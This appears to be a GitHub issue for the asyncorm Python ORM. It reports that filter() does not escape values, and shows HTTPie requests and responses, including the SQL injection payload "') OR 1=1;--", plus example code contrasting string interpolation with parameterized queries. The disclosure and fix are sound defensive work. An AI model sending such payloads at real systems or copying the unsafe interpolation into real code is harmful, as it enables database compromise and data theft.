monobot / asyncorm

Fully async ORM inspired by Django's


`ModelManager.filter()` does not escape filter values.

sqwishy opened this issue

The ORM doesn't seem to sanitize values passed to filter(), so things like apostrophes can make it upset.

Reproduced using the "sanic" example in the repository:

```
# http --json -v 'localhost:9000/books/' name=="The Pilgrim's Progress"
GET /books/?name=The+Pilgrim%27s+Progress HTTP/1.1
Accept: application/json
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/json
Host: localhost:9000
User-Agent: HTTPie/0.9.4



HTTP/1.1 500 Internal Server Error
Connection: keep-alive
Content-Length: 6824
Content-Type: text/html; charset=utf-8
Keep-Alive: 60
...
```

With a traceback saying something about asyncpg.exceptions.PostgresSyntaxError: syntax error at or near "s"

Alternatively:

```
# http --json -v 'localhost:9000/books/' name=="') OR 1=1;--"
GET /books/?name=%27%29+OR+1%3D1%3B-- HTTP/1.1
Accept: application/json
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/json
Host: localhost:9000
User-Agent: HTTPie/0.9.4



HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 176
Content-Type: application/json
Keep-Alive: 60

{
    "count": 1,
    "method": "GET",
    "results": [
        {
            "book_type": null,
            "date_created": "2017-08-18",
            "id": 1,
            "name": "The Pilgrim's Progress",
            "pages": null,
            "synopsis": "an epic meme"
        }
    ],
    "status": 200
}
```
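The root cause and its fix, as an added example that is not asyncorm's own code: a WHERE-clause builder that pastes filter values into the SQL text (the behaviour the report describes) next to one that emits asyncpg-style `$n` placeholders and passes the values separately. The function names and the `"book"` table are assumptions for illustration; the two filter values are the ones from the report, reused as constructed input.

```python
"""Constructed example: parameterize filter() values instead of interpolating them."""
from typing import Any, Dict, List, Tuple

# Sample inputs taken from the report above (constructed test data, not live requests).
APOSTROPHE_NAME = "The Pilgrim's Progress"
INJECTION_NAME = "') OR 1=1;--"


def build_where_unsafe(table: str, filters: Dict[str, Any]) -> str:
    """The reported failure mode: values become part of the SQL text.
    An apostrophe in the value closes the literal early, so Postgres reports
    a syntax error, or worse, the remainder of the value is parsed as SQL."""
    clauses = ["{} = '{}'".format(col, val) for col, val in filters.items()]
    return "SELECT * FROM {} WHERE {}".format(table, " AND ".join(clauses))


def build_where(table: str, filters: Dict[str, Any]) -> Tuple[str, List[Any]]:
    """Hardened form: the SQL text holds only validated identifiers and $n
    placeholders (asyncpg's positional style); values travel out of band and
    are never parsed as SQL, whatever characters they contain."""
    params: List[Any] = []
    clauses: List[str] = []
    for col, val in filters.items():
        # Identifiers cannot be bound parameters, so they are validated and quoted.
        if not col.isidentifier():
            raise ValueError("refusing non-identifier column name: %r" % col)
        params.append(val)
        clauses.append('"{}" = ${}'.format(col, len(params)))
    if not table.isidentifier():
        raise ValueError("refusing non-identifier table name: %r" % table)
    return 'SELECT * FROM "{}" WHERE {}'.format(table, " AND ".join(clauses)), params


def has_unbalanced_quotes(sql: str) -> bool:
    """Cheap check that catches the apostrophe case: an odd count of single
    quotes in the statement text means a literal was broken open."""
    return sql.count("'") % 2 == 1


# With asyncpg the hardened pair is executed as: await conn.fetch(sql, *params)
# (not run here; the example needs no database).
```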

hey @sqwishy thanks for pointing that out, will take care of that asap